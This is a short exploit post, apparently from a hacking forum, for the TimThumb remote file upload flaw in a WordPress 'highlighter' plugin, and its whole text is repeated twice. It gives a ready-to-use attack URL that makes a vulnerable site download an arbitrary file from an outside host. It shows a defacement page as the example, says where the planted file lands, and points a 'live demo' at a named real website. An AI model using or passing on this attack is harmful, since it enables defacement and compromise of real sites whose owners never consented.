wordpress timthumb remote file upload Vulnerability
in this Vulnerability you can include any file (every format allowed)on Vulnerable wrdpress website
this bug known as "timthumb.php" exploit
exploit: http://wordpresssite.com/wp-content/plugins/highlighter/libs/timthumb.php?src=http://websiteite.com/anyfile.fileformat
example : http://wordpresssite.com/wp-content/plugins/highlighter/libs/timthumb.php?src=http://www.devilscafe.in/deface.html
after acessing this url that file will upload on website remotly on website
to view your uploaded file goto :
http://wordpresssite.com/wp-content/plugins/highlighter/libs/temp/yourfilehere
(file will upload with a random name like fe0555b78d04cb3c76cff7e10cf05b77, check last file to view your file)
live Demo : http://www.currentlyobsessed.com/wp-content/plugins/highlighter/libs/timthumb.php?src=http://pastehtml.com/view/btuwhb6nl.html
Result :http://www.currentlyobsessed.com/wp-content/plugins/highlighter/libs/temp/1dc2c9907ce70a6ed472bbb1cad3cf71.html
in this Vulnerability you can include any file (every format allowed)on Vulnerable wrdpress website
this bug known as "timthumb.php" exploit
exploit: http://wordpresssite.com/wp-content/plugins/highlighter/libs/timthumb.php?src=http://websiteite.com/anyfile.fileformat
example : http://wordpresssite.com/wp-content/plugins/highlighter/libs/timthumb.php?src=http://www.devilscafe.in/deface.html
after acessing this url that file will upload on website remotly on website
to view your uploaded file goto :
http://wordpresssite.com/wp-content/plugins/highlighter/libs/temp/yourfilehere
(file will upload with a random name like fe0555b78d04cb3c76cff7e10cf05b77, check last file to view your file)
live Demo : http://www.currentlyobsessed.com/wp-content/plugins/highlighter/libs/timthumb.php?src=http://pastehtml.com/view/btuwhb6nl.html
Result :http://www.currentlyobsessed.com/wp-content/plugins/highlighter/libs/temp/1dc2c9907ce70a6ed472bbb1cad3cf71.html